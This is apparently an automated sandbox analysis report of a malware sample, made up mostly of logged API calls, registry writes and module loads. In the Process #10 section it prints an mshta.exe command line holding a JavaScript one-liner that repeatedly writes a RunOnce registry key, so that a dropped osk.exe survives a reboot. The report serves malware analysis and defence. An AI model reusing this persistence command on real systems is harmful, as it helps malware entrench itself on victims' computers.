Get Time	type = Performance Ctr, time = 24132333512	1	Fn
Get Time	type = Performance Ctr, time = 24133857260	1	Fn
Get Time	type = Performance Ctr, time = 24133866725	1	Fn
Get Time	type = Performance Ctr, time = 24136991441	1	Fn
Get Time	type = Performance Ctr, time = 24137005020	1	Fn
Get Time	type = Performance Ctr, time = 24138553295	1	Fn
Get Time	type = Performance Ctr, time = 24138566005	1	Fn
Get Time	type = Performance Ctr, time = 24140114748	1	Fn
Get Time	type = Performance Ctr, time = 24140129135	1	Fn
Get Time	type = Performance Ctr, time = 24143231149	1	Fn
Get Time	type = Performance Ctr, time = 24143239959	1	Fn
Get Time	type = Performance Ctr, time = 24144812918	1	Fn
Get Time	type = Performance Ctr, time = 24144826142	1	Fn
Get Time	type = Performance Ctr, time = 24147926134	1	Fn
Get Time	type = Performance Ctr, time = 24147938762	1	Fn
Get Time	type = Performance Ctr, time = 24149500229	1	Fn
Get Time	type = Performance Ctr, time = 24149515328	1	Fn
Get Time	type = Performance Ctr, time = 24151059349	1	Fn
Get Time	type = Performance Ctr, time = 24151072186	1	Fn
Get Time	type = Performance Ctr, time = 24154188582	1	Fn
Get Time	type = Performance Ctr, time = 24154201211	1	Fn
Get Time	type = Performance Ctr, time = 24157305362	1	Fn
Get Time	type = Performance Ctr, time = 24157318518	1	Fn
Get Time	type = Performance Ctr, time = 24158855771	1	Fn
Get Time	type = Performance Ctr, time = 24158868566	1	Fn
Get Time	type = Performance Ctr, time = 24160444253	1	Fn
Get Time	type = Performance Ctr, time = 24160459689	1	Fn
Get Time	type = Performance Ctr, time = 24163554476	1	Fn
Get Time	type = Performance Ctr, time = 24163567617	1	Fn
Get Time	type = Performance Ctr, time = 24166680338	1	Fn
Get Time	type = Performance Ctr, time = 24166693626	1	Fn
Get Time	type = Performance Ctr, time = 24168235982	1	Fn
Get Time	type = Performance Ctr, time = 24168250607	1	Fn
Get Time	type = Performance Ctr, time = 24171807242	1	Fn
Get Time	type = Performance Ctr, time = 24171820134	1	Fn
Get Time	type = Performance Ctr, time = 24174487943	1	Fn
Get Time	type = Performance Ctr, time = 24174500938	1	Fn
Get Time	type = Performance Ctr, time = 24176049114	1	Fn
Get Time	type = Performance Ctr, time = 24176060901	1	Fn
Get Time	type = Performance Ctr, time = 24177619744	1	Fn
Get Time	type = Performance Ctr, time = 24177630124	1	Fn
Get Time	type = Performance Ctr, time = 24180757716	1	Fn
Get Time	type = Performance Ctr, time = 24180771422	1	Fn
Get Time	type = Performance Ctr, time = 24183858825	1	Fn
Get Time	type = Performance Ctr, time = 24183871839	1	Fn
Get Time	type = Performance Ctr, time = 24185441739	1	Fn
Get Time	type = Performance Ctr, time = 24185457104	1	Fn
Get Time	type = Performance Ctr, time = 24190105254	1	Fn
Get Time	type = Performance Ctr, time = 24190118169	1	Fn
Get Time	type = Performance Ctr, time = 24190138396	1	Fn
Get Time	type = Performance Ctr, time = 24190145562	1	Fn
Get Time	type = Performance Ctr, time = 24193233829	1	Fn
Get Time	type = Performance Ctr, time = 24193247457	1	Fn
Get Time	type = Performance Ctr, time = 24194829849	1	Fn
Get Time	type = Performance Ctr, time = 24194844476	1	Fn
Get Time	type = Performance Ctr, time = 24197921836	1	Fn
Get Time	type = Performance Ctr, time = 24197934969	1	Fn
Get Time	type = Performance Ctr, time = 24201051275	1	Fn
Get Time	type = Performance Ctr, time = 24201064085	1	Fn
Get Time	type = Performance Ctr, time = 24202606836	1	Fn
Get Time	type = Performance Ctr, time = 24202619626	1	Fn
Get Time	type = Performance Ctr, time = 24204185745	1	Fn
Get Time	type = Performance Ctr, time = 24204199989	1	Fn
Get Time	type = Performance Ctr, time = 24205734836	1	Fn
Get Time	type = Performance Ctr, time = 24205749252	1	Fn
Get Time	type = Performance Ctr, time = 24208856107	1	Fn
Get Time	type = Performance Ctr, time = 24208868813	1	Fn
Get Time	type = Performance Ctr, time = 24211983829	1	Fn
Get Time	type = Performance Ctr, time = 24211993538	1	Fn
Get Time	type = Performance Ctr, time = 24215108629	1	Fn
Get Time	type = Performance Ctr, time = 24215121211	1	Fn
Get Time	type = Performance Ctr, time = 24216677568	1	Fn
Get Time	type = Performance Ctr, time = 24216689403	1	Fn
Get Time	type = Performance Ctr, time = 24219818480	1	Fn
Get Time	type = Performance Ctr, time = 24219831058	1	Fn
Get Time	type = Performance Ctr, time = 24222925383	1	Fn
Get Time	type = Performance Ctr, time = 24222936555	1	Fn
Get Time	type = Performance Ctr, time = 24224484569	1	Fn
Get Time	type = Performance Ctr, time = 24224497197	1	Fn
Get Time	type = Performance Ctr, time = 24227603571	1	Fn
Get Time	type = Performance Ctr, time = 24227614586	1	Fn
Get Time	type = Performance Ctr, time = 24229179692	1	Fn
Get Time	type = Performance Ctr, time = 24229192539	1	Fn
Get Time	type = Performance Ctr, time = 24232320579	1	Fn
Get Time	type = Performance Ctr, time = 24232333888	1	Fn
Get Time	type = Performance Ctr, time = 24235442126	1	Fn
Get Time	type = Performance Ctr, time = 24235455097	1	Fn
Get Time	type = Performance Ctr, time = 24236996229	1	Fn
Get Time	type = Performance Ctr, time = 24237009483	1	Fn
Get Time	type = Performance Ctr, time = 24240118330	1	Fn
Get Time	type = Performance Ctr, time = 24240129547	1	Fn
Get Time	type = Performance Ctr, time = 24241718355	1	Fn
Get Time	type = Performance Ctr, time = 24241733417	1	Fn
Get Time	type = Performance Ctr, time = 24244812914	1	Fn
Get Time	type = Performance Ctr, time = 24244828126	1	Fn
Get Time	type = Performance Ctr, time = 24247627608	1	Fn
Get Time	type = Performance Ctr, time = 24247642739	1	Fn
Get Time	type = Performance Ctr, time = 24249493591	1	Fn
Get Time	type = Performance Ctr, time = 24249508713	1	Fn
Get Time	type = Performance Ctr, time = 24252640932	1	Fn
Get Time	type = Performance Ctr, time = 24252655772	1	Fn
Get Time	type = Performance Ctr, time = 24255743411	1	Fn
Get Time	type = Performance Ctr, time = 24255756707	1	Fn
Get Time	type = Performance Ctr, time = 24258869578	1	Fn
Get Time	type = Performance Ctr, time = 24258884659	1	Fn
Get Time	type = Performance Ctr, time = 24261993329	1	Fn
Get Time	type = Performance Ctr, time = 24262009031	1	Fn
Get Time	type = Performance Ctr, time = 24263795302	1	Fn
Get Time	type = Performance Ctr, time = 24263814334	1	Fn
Get Time	type = Performance Ctr, time = 24269455759	1	Fn
Get Time	type = Performance Ctr, time = 24269472156	1	Fn
Get Time	type = Performance Ctr, time = 24274706804	1	Fn
Get Time	type = Performance Ctr, time = 24274721389	1	Fn
Get Time	type = Performance Ctr, time = 24274756475	1	Fn
Get Time	type = Performance Ctr, time = 24274767028	1	Fn
Get Time	type = Performance Ctr, time = 24275486169	1	Fn
Get Time	type = Performance Ctr, time = 24275501536	1	Fn
Get Time	type = Performance Ctr, time = 24275519326	1	Fn
Get Time	type = Performance Ctr, time = 24275533126	1	Fn
Get Time	type = Performance Ctr, time = 24275550449	1	Fn
Get Time	type = Performance Ctr, time = 24275564222	1	Fn
Get Time	type = Performance Ctr, time = 24275570873	1	Fn
Get Time	type = Ticks, time = 242718	2	Fn
Get Time	type = Performance Ctr, time = 24276692079	1	Fn
Get Time	type = Performance Ctr, time = 24277622561	1	Fn
Get Time	type = Performance Ctr, time = 24277638265	1	Fn
Get Time	type = Performance Ctr, time = 24280744000	1	Fn
Get Time	type = Performance Ctr, time = 24280759802	1	Fn
Get Time	type = Performance Ctr, time = 24282321393	1	Fn
Get Time	type = Performance Ctr, time = 24282336615	1	Fn
Get Time	type = Performance Ctr, time = 24283881823	1	Fn
Get Time	type = Performance Ctr, time = 24283891721	1	Fn
Get Time	type = System Time, time = 2019-04-12 09:18:16 (UTC)	5	Fn
Get Time	type = Ticks, time = 242812	5	Fn
Get Time	type = Performance Ctr, time = 24287010257	1	Fn
Get Time	type = Performance Ctr, time = 24287026676	1	Fn
Get Time	type = Performance Ctr, time = 24288819390	1	Fn
Get Time	type = Performance Ctr, time = 24288834203	1	Fn
Get Time	type = Performance Ctr, time = 24291693760	1	Fn
Get Time	type = Performance Ctr, time = 24291708404	1	Fn
Get Time	type = Performance Ctr, time = 24293246774	1	Fn
Get Time	type = Performance Ctr, time = 24293264589	1	Fn
Get Time	type = Performance Ctr, time = 24296417188	1	Fn
Get Time	type = Performance Ctr, time = 24296433326	1	Fn
Get Time	type = Performance Ctr, time = 24299485310	1	Fn
Get Time	type = Performance Ctr, time = 24299498303	1	Fn
Get Time	type = Performance Ctr, time = 24302606364	1	Fn
Get Time	type = Performance Ctr, time = 24302617785	1	Fn
Get Time	type = Performance Ctr, time = 24304187548	1	Fn
Get Time	type = Performance Ctr, time = 24304201669	1	Fn
Get Time	type = Performance Ctr, time = 24305740877	1	Fn
Get Time	type = Performance Ctr, time = 24305755113	1	Fn
Get Time	type = Performance Ctr, time = 24307333960	1	Fn
Get Time	type = Performance Ctr, time = 24307346737	1	Fn
Get Time	type = Performance Ctr, time = 24314246270	1	Fn
Get Time	type = Performance Ctr, time = 24314261338	1	Fn
Get Time	type = Performance Ctr, time = 24314287514	1	Fn
Get Time	type = Performance Ctr, time = 24314296427	1	Fn
Get Time	type = Performance Ctr, time = 24317117428	1	Fn
Get Time	type = Performance Ctr, time = 24317131042	1	Fn
Get Time	type = Performance Ctr, time = 24320287997	1	Fn
Get Time	type = Performance Ctr, time = 24320301466	1	Fn
Get Time	type = Performance Ctr, time = 24321801302	1	Fn
Get Time	type = Performance Ctr, time = 24321815393	1	Fn
Get Time	type = Performance Ctr, time = 24323362253	1	Fn
Get Time	type = Performance Ctr, time = 24323375416	1	Fn
Get Time	type = Performance Ctr, time = 24324916181	1	Fn
Get Time	type = Performance Ctr, time = 24324929457	1	Fn
Get Time	type = Performance Ctr, time = 24326490241	1	Fn
Get Time	type = Performance Ctr, time = 24326504749	1	Fn
Get Time	type = Performance Ctr, time = 24329639379	1	Fn
Get Time	type = Performance Ctr, time = 24329654317	1	Fn
Get Time	type = Performance Ctr, time = 24331684762	1	Fn
Get Time	type = Performance Ctr, time = 24331700202	1	Fn
Get Time	type = Performance Ctr, time = 24334345366	1	Fn
Get Time	type = Performance Ctr, time = 24334360519	1	Fn
Get Time	type = Performance Ctr, time = 24335861805	1	Fn
Get Time	type = Performance Ctr, time = 24335875544	1	Fn
Get Time	type = Performance Ctr, time = 24338985793	1	Fn
Get Time	type = Performance Ctr, time = 24339000688	1	Fn
Get Time	type = Performance Ctr, time = 24342112588	1	Fn
Get Time	type = Performance Ctr, time = 24342126839	1	Fn
Get Time	type = Performance Ctr, time = 24345230638	1	Fn
Get Time	type = Performance Ctr, time = 24345244621	1	Fn
Get Time	type = Performance Ctr, time = 24346804059	1	Fn
Get Time	type = Performance Ctr, time = 24346818558	1	Fn
Get Time	type = Performance Ctr, time = 24349924540	1	Fn
Get Time	type = Performance Ctr, time = 24349934948	1	Fn
Get Time	type = Performance Ctr, time = 24351492311	1	Fn
Get Time	type = Performance Ctr, time = 24351502166	1	Fn
Get Time	type = Performance Ctr, time = 24433761438	1	Fn
Get Time	type = Performance Ctr, time = 24433774791	1	Fn
Get Time	type = Performance Ctr, time = 24433802759	1	Fn
Get Time	type = Performance Ctr, time = 24433810016	1	Fn
Get Time	type = Performance Ctr, time = 24435887666	1	Fn
Get Time	type = Performance Ctr, time = 24435900601	1	Fn
Get Time	type = Performance Ctr, time = 24454570531	1	Fn
Get Time	type = Performance Ctr, time = 24454583771	1	Fn
Get Time	type = Performance Ctr, time = 24456167710	1	Fn
Get Time	type = Performance Ctr, time = 24456180485	1	Fn
Get Time	type = Ticks, time = 244546	2	Fn
Get Time	type = Performance Ctr, time = 24459156144	1	Fn
Get Time	type = Performance Ctr, time = 24459164713	1	Fn
Get Time	type = Performance Ctr, time = 24459170304	1	Fn
Get Time	type = Performance Ctr, time = 24459292482	1	Fn
Get Time	type = Performance Ctr, time = 24459300383	1	Fn
Get Time	type = System Time, time = 2019-04-12 09:18:18 (UTC)	3	Fn
Get Time	type = Ticks, time = 244562	3	Fn
Get Time	type = Performance Ctr, time = 24462412577	1	Fn
Get Time	type = Performance Ctr, time = 24462425791	1	Fn
Get Time	type = Performance Ctr, time = 24463984414	1	Fn
Get Time	type = Performance Ctr, time = 24463997827	1	Fn
Get Time	type = Performance Ctr, time = 24471129657	1	Fn
Get Time	type = Performance Ctr, time = 24471143015	1	Fn
Get Time	type = Performance Ctr, time = 24471165271	1	Fn
Get Time	type = Performance Ctr, time = 24471172929	1	Fn
Get Time	type = Performance Ctr, time = 24473349405	1	Fn
Get Time	type = Performance Ctr, time = 24473361086	1	Fn
Get Time	type = Performance Ctr, time = 24476486307	1	Fn
Get Time	type = Performance Ctr, time = 24476498193	1	Fn
Get Time	type = Ticks, time = 244734	3	Fn
Get Time	type = Performance Ctr, time = 24477116835	1	Fn
Get Time	type = Performance Ctr, time = 24477124268	1	Fn
Get Time	type = Performance Ctr, time = 24477213923	1	Fn
Get Time	type = Performance Ctr, time = 24478042840	1	Fn
Get Time	type = Performance Ctr, time = 24478050956	1	Fn
Get Time	type = Performance Ctr, time = 24478101386	1	Fn
Get Time	type = Ticks, time = 244750	3	Fn
Get Time	type = Performance Ctr, time = 24478216855	1	Fn
Get Time	type = Performance Ctr, time = 24478278368	1	Fn
Get Time	type = Performance Ctr, time = 24478570028	1	Fn
Get Time	type = Performance Ctr, time = 24479595108	1	Fn
Get Time	type = Performance Ctr, time = 24479625144	1	Fn
Get Time	type = Performance Ctr, time = 24481167913	1	Fn
Get Time	type = Performance Ctr, time = 24481199751	1	Fn
Get Time	type = Performance Ctr, time = 24482723892	1	Fn
Get Time	type = Performance Ctr, time = 24482755985	1	Fn
Get Time	type = Performance Ctr, time = 24485852205	1	Fn
Get Time	type = Performance Ctr, time = 24485880853	1	Fn
Get Time	type = Performance Ctr, time = 24488975352	1	Fn
Get Time	type = Performance Ctr, time = 24489005394	1	Fn
Get Time	type = Performance Ctr, time = 24489028178	1	Fn
Get Time	type = Ticks, time = 244875	7	Fn
Get Time	type = Performance Ctr, time = 24490676077	1	Fn
Get Time	type = Performance Ctr, time = 24490689016	1	Fn
Get Time	type = Performance Ctr, time = 24490766585	1	Fn
Get Time	type = Performance Ctr, time = 24490771730	1	Fn
Get Time	type = Performance Ctr, time = 24492100555	1	Fn
Get Time	type = Performance Ctr, time = 24492125851	1	Fn
Get Time	type = Performance Ctr, time = 24494137713	1	Fn
Get Time	type = Performance Ctr, time = 24494173187	1	Fn
Get Time	type = Performance Ctr, time = 24494259070	1	Fn
Get Time	type = Performance Ctr, time = 24494265738	1	Fn
Get Time	type = Performance Ctr, time = 24494275321	1	Fn
Get Time	type = Performance Ctr, time = 24494281795	1	Fn
Get Time	type = Ticks, time = 244906	3	Fn
Get Time	type = Performance Ctr, time = 24495012155	1	Fn
Get Time	type = Performance Ctr, time = 24495250961	1	Fn
Get Time	type = Performance Ctr, time = 24496794929	1	Fn
Get Time	type = Performance Ctr, time = 24496830689	1	Fn
For performance reasons, the remaining 10 entries are omitted. The remaining entries can be found in glog.xml.

Environment (3)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	name = JS_DEBUG_SCOPE		2	Fn
Get Environment String	name = JS_PROFILER		1	Fn

Ini (5)

Operation	Filename	Additional Information	Count	Logfile
Read	Win.ini	section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20	1	Fn
Read	Win.ini	section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50	1	Fn
Read	Win.ini	section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200	1	Fn
Read	Win.ini	section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50	1	Fn
Read	Win.ini	section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11	1	Fn

Debug (1)

Operation	Process	Additional Information	Success	Count	Logfile
Check for Presence	c:\windows\syswow64\mshta.exe	-		1	Fn

Process #10: mshta.exe

4386

Information	Value
ID	#10
File Name	c:\windows\syswow64\mshta.exe
Command Line	mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\shwlwook',i);}catch(e){}},10);"
Initial Working Directory	C:\Users\FD1HVy\AppData\Roaming\
Monitor	Start Time: 00:04:10, Reason: Child Process
Unmonitor	End Time: 00:05:21, Reason: Terminated by Timeout
Monitor Duration	00:01:10

OS Process Information

Information	Value
PID	0xd00
Parent PID	0x6cc (c:\users\fd1hvy\appdata\roaming\osk.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x E38 0x 8E8 0x BEC 0x E5C 0x FC8 0x F70 0x BFC 0x 8F4 0x E60 0x E40 0x 4B8 0x EC4 0x FA0 0x FF4

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	Actions
jscript9.dll	0x716A0000	0x71A24FFF	Marked Writable	-	32-bit	-	... Region Actions Download Dump
mshta.exe	0x01320000	0x01327FFF	Forced	-	32-bit	-	... Region Actions Download Dump
buffer	0x080C0000	0x080DFFFF	Marked Executable	-	32-bit	-	... Region Actions Download Dump

Host Behavior

COM (6)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	3050F5C8-98B5-11CF-BB82-00AA00BDCE0B	00000000-0000-0000-C000-000000000046	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	50D5107A-D278-4871-8989-F4CEAAF59CFC	08C0E040-62D1-11D1-9326-0060B067B86E	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD	1	Fn
Create	16D51579-A30B-4C8B-A276-0FF4DC41E755	BB1A2AE1-A4F9-11CF-8F20-00805F2CD064	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	842A1268-6E6A-465C-868F-8BC445B9828F	8F88FD19-5D42-477B-BD45-F6A4A977ED05	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	WScript.Shell	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER	1	Fn
Create	Scripting.FileSystemObject	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER	1	Fn

File (1)

Operation	Filename	Additional Information	Success	Count	Logfile
Open Mapping	#MSHTML#PERF#00000D00	desired_access = FILE_MAP_WRITE		1	Fn

Registry (2397)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce	-	1	Fn
Create Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce	-	757	Fn
Create Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce	-	308	Fn
Create Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce	-	128	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ChakraRecycler	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ChakraRecycler	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Parental Controls\Users\S-1-5-21-1051304884-625712362-2192934891-1000	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\JScriptLegacy	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\JScriptLegacy	-	1	Fn
Open Key	HKEY_CURRENT_USER\EUDC\1252	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	value_name = Path, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Application Compatibility	value_name = mshta.exe, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	value_name = NoFileMenu	1	Fn
Write Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce	value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ	1	Fn
Write Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce	value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ	757	Fn
Write Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce	value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ	308	Fn
Write Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce	value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ	128	Fn

Module (44)

Operation	Module	Additional Information	Count	Logfile
Load	comctl32.dll	base_address = 0x72440000	1	Fn
Load	urlmon.dll	base_address = 0x74100000	1	Fn
Load	WLDP.DLL	base_address = 0x723e0000	1	Fn
Load	ext-ms-win-ntuser-touch-hittest-l1-1-0.dll	base_address = 0x74b70000	1	Fn
Load	OLEACC.DLL	base_address = 0x71fa0000	1	Fn
Load	mshtml.dll	base_address = 0x726c0000	2	Fn
Load	api-ms-win-core-winrt-l1-1-0.dll	base_address = 0x75c50000	1	Fn
Load	api-ms-win-core-winrt-string-l1-1-0.dll	base_address = 0x75c50000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75e90000	3	Fn
Get Handle	c:\windows\syswow64\mshta.exe	base_address = 0x1320000	2	Fn
Get Handle	c:\windows\syswow64\user32.dll	base_address = 0x74b70000	1	Fn
Get Handle	c:\windows\syswow64\mshtml.dll	base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Handle	c:\windows\syswow64\mshtml.dll	base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Handle	c:\windows\syswow64\mshtml.dll	base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Handle	c:\windows\syswow64\mshtml.dll	base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Handle	c:\windows\syswow64\jscript9.dll	base_address = 0x716a0000	1	Fn
Get Handle	c:\windows\syswow64\jscript9.dll	base_address = 0x716a0000	1	Fn
Get Handle	c:\windows\syswow64\kernelbase.dll	base_address = 0x74ea0000	1	Fn
Get Handle	c:\windows\syswow64\mshtml.dll	base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Filename	-	process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 260	2	Fn
Get Filename	c:\windows\syswow64\mshta.exe	process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 260	1	Fn
Get Filename	-	process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\Windows\System32\jscript9.dll, size = 260	1	Fn
Get Filename	-	process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 261	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSetInformation, address_out = 0x75ea5850	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetCoalescableTimer, address_out = 0x74ba3c80	1	Fn
Get Address	c:\windows\syswow64\urlmon.dll	function = 471, address_out = 0x741845d0	1	Fn
Get Address	c:\windows\syswow64\wldp.dll	function = WldpGetLockdownPolicy, address_out = 0x723e3c20	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterTouchHitTestingWindow, address_out = 0x74ba3b50	1	Fn
Get Address	c:\windows\syswow64\oleacc.dll	function = LresultFromObject, address_out = 0x71faf590	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryProtectedPolicy, address_out = 0x74f71cd0	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = ResolveDelayLoadedAPI, address_out = 0x74f9a730	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = ResolveDelayLoadsFromDll, address_out = 0x7500d8e0	1	Fn
Get Address	c:\windows\syswow64\combase.dll	function = WindowsCreateStringReference, address_out = 0x75d0a150	1	Fn
Get Address	c:\windows\syswow64\combase.dll	function = RoGetActivationFactory, address_out = 0x75d00fa0	1	Fn
Create Mapping	-	filename = System Paging File, protection = PAGE_READWRITE, SEC_COMMIT, maximum_size = 40	1	Fn
Map	-	process_name = c:\windows\syswow64\mshta.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ	1	Fn
Map	-	process_name = c:\windows\syswow64\mshta.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ	1	Fn

Window (14)

Operation	Window Name	Additional Information	Count	Logfile
Create	-	class_name = HTML Application Host Window Class, wndproc_parameter = 1938289816	1	Fn
Create	-	class_name = HTML Application Host Window Class, wndproc_parameter = 1938289816	1	Fn
Create	-	wndproc_parameter = 0	1	Fn
Create	-	wndproc_parameter = 76972032	1	Fn
Create	-	wndproc_parameter = 76849872	1	Fn
Create	-	class_name = WorkerW, wndproc_parameter = 0	1	Fn
Find	-	class_name = MS_AutodialMonitor	1	Fn
Find	-	class_name = MS_WebCheckMonitor	1	Fn
Set Attribute	-	class_name = HTML Application Host Window Class, index = -16, new_long = -2100363264	2	Fn
Set Attribute	-	index = -21, new_long = 76849872	1	Fn
Set Attribute	-	class_name = WorkerW, index = 0, new_long = 10683448	1	Fn
Set Attribute	-	class_name = WorkerW, index = -4, new_long = 1926608192	1	Fn
Set Attribute	-	class_name = HTML Application Host Window Class, index = -20, new_long = 262144	1	Fn

Keyboard (124)

Operation	Additional Information	Count	Logfile
Get Info	type = KB_LOCALE_ID	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	1	Fn
Get Info	type = KB_LOCALE_ID_NAME, result_out = 00000409	1	Fn
Read	virtual_key_code = VK_LBUTTON, result_out = 0	5	Fn
Read	virtual_key_code = VK_RBUTTON, result_out = 0	5	Fn
Read	virtual_key_code = VK_SHIFT, result_out = 0	20	Fn
Read	virtual_key_code = VK_CONTROL, result_out = 0	20	Fn
Read	virtual_key_code = VK_MBUTTON, result_out = 0	5	Fn
Read	virtual_key_code = VK_MENU, result_out = 0	20	Fn
Read	virtual_key_code = VK_LSHIFT, result_out = 0	15	Fn
Read	virtual_key_code = VK_LCONTROL, result_out = 0	15	Fn
Read	virtual_key_code = VK_LMENU, result_out = 0	15	Fn

System (582)

Operation	Additional Information	Count	Logfile
Get window text	window_text = 9822284	1	Fn
Get Cursor	x_out = 1000, y_out = 495	17	Fn
Sleep	duration = -1 (infinite)	126	Fn
Sleep	duration = 100 milliseconds (0.100 seconds)	3	Fn
Sleep	duration = -1 (infinite)	3	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = Ticks, time = 254625	2	Fn
Get Time	type = Ticks, time = 255328	1	Fn
Get Time	type = Performance Ctr, time = 25542052685	1	Fn
Get Time	type = Performance Ctr, time = 25555915287	1	Fn
Get Time	type = System Time, time = 2019-04-12 09:18:29 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 25555925438	1	Fn
Get Time	type = Performance Ctr, time = 25575847217	1	Fn
Get Time	type = Performance Ctr, time = 25575907710	1	Fn
Get Time	type = Performance Ctr, time = 25575933768	1	Fn
Get Time	type = Performance Ctr, time = 25575940149	1	Fn
Get Time	type = Performance Ctr, time = 25575946464	1	Fn
Get Time	type = Performance Ctr, time = 25575981759	1	Fn
Get Time	type = Performance Ctr, time = 25575990960	1	Fn
Get Time	type = Ticks, time = 255718	1	Fn
Get Time	type = Performance Ctr, time = 25576071328	1	Fn
Get Time	type = Performance Ctr, time = 25578413713	1	Fn
Get Time	type = Performance Ctr, time = 25578427659	1	Fn
Get Time	type = Performance Ctr, time = 25581336016	1	Fn
Get Time	type = Performance Ctr, time = 25581360392	1	Fn
Get Time	type = Performance Ctr, time = 25581387852	1	Fn
Get Time	type = Performance Ctr, time = 25582817913	1	Fn
Get Time	type = Performance Ctr, time = 25582843214	1	Fn
Get Time	type = Performance Ctr, time = 25585904170	1	Fn
Get Time	type = Performance Ctr, time = 25585931256	1	Fn
Get Time	type = Performance Ctr, time = 25591237530	1	Fn
Get Time	type = Performance Ctr, time = 25591262534	1	Fn
Get Time	type = Performance Ctr, time = 25591281828	1	Fn
Get Time	type = Performance Ctr, time = 25591306175	1	Fn
Get Time	type = Performance Ctr, time = 25592127915	1	Fn
Get Time	type = Performance Ctr, time = 25593726483	1	Fn
Get Time	type = Performance Ctr, time = 25593750704	1	Fn
Get Time	type = Performance Ctr, time = 25596852899	1	Fn
Get Time	type = Performance Ctr, time = 25596880812	1	Fn
Get Time	type = Performance Ctr, time = 25598536860	1	Fn
Get Time	type = Performance Ctr, time = 25598565705	1	Fn
Get Time	type = Performance Ctr, time = 25601533840	1	Fn
Get Time	type = Performance Ctr, time = 25601557989	1	Fn
Get Time	type = Performance Ctr, time = 25605303282	1	Fn
Get Time	type = Performance Ctr, time = 25605337153	1	Fn
Get Time	type = Performance Ctr, time = 25606230885	1	Fn
Get Time	type = Performance Ctr, time = 25606259312	1	Fn
Get Time	type = Performance Ctr, time = 25609387821	1	Fn
Get Time	type = Performance Ctr, time = 25609399881	1	Fn
Get Time	type = Performance Ctr, time = 25610901933	1	Fn
